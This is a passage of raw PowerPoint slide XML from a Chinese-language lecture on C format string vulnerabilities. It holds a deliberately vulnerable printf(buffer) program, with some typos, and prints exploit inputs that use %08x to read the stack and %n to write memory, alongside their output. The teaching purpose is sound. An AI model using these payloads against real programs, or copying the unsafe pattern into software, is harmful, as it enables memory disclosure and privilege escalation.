              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>工作原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1484313"/>
            <a:ext cx="7772400" cy="4459287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>格式化函数每次遍历格式化串的一个字符。如果该字符不是格式化参数，则辅之输出该字符。如果遇到一个格式化参数，就采取相应的动作，并使用栈中与那个参数相对应的参量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果格式化使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>个格式化参数，而只有三个参量呢？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>A is %d and is at %08x. B is %d and is at %08x.\n”,A,&amp;A,B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2025156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amond(in)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="20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diamond(in)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="20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diamond(in)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="295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25980B48-4775-4105-9DA8-FC197CF0C548}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>格式化字符串的漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="1557338"/>
            <a:ext cx="7772400" cy="4818062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>格式化字符串漏洞同其他许多安全漏洞一样是由于程序员的懒惰造成的。程序员的任务是：打印输出一个字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>printf("%s", str); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>有时程序员为了节约时间和提高效率，并在源码中少输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>个字节，他会这样写： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>printf(str); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3912423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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="296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C872AAB3-7D51-40ED-A661-F5A376F03B01}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86020" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="765175"/>
            <a:ext cx="7772400" cy="5178425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>#include &lt;stdio.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>int main(int argc, char **argv)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t> { char buf[100]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>	int x;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t> 	if(argc != 2) exit(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>	 x = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t> 	strcp (buf, argv[1]); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>	printf(“the right way:\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>	printf(“%s“,buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>	printf(“\nthe wrong way:\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>	Printf(buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>	return 0; } </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1310057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B085327E-FEFE-4071-8537-3440D62CEB28}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>读取任意存贮地址的内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87044" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>./fmt_vuln AAAA%08x.%08x.%08x.%08x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>The right way:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>AAAA%08x.%08x.%08x.%08x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>The wrong way:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>AAAAbffff590.000003e8.000003e8.41414141</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>如果把最后一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>呢</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>./fmt_vuln `perl  -e ‘print”\x14\xfd\xff\xbf ”’`%08x.%08x.%08x.%08x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3068671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B627CF13-1FFE-45E6-89FB-6AF8A68382C4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>向任意存储地址写入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="1700213"/>
            <a:ext cx="7772400" cy="4962525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>printf (“the number of bytes written up to this point x%n is being stored in count_one”,&amp;count_one);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$./fmt_vuln `printf “\x70\x95\x04\x08”`%x.%x.%x%n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>The right way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>%x.%x.%x%n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>The wrong way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Bffff5a0.3e8.3e8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Testval @0x08049570 =20 0x00000014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185611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blinds(horizontal)">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blinds(horizontal)">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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30003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00035">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30003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00035">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30003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00035">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30003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00035">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="300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zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>危害性和普遍性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294915" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658813" y="1554162"/>
            <a:ext cx="7772400" cy="4648517"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>普遍性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>1999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>CERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>安全建议中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>50%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>以上同它有关。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>严重性获得系统最高权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>没有有效预防措施</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>语言问题</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>程序员编程习惯，安全意识薄弱</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
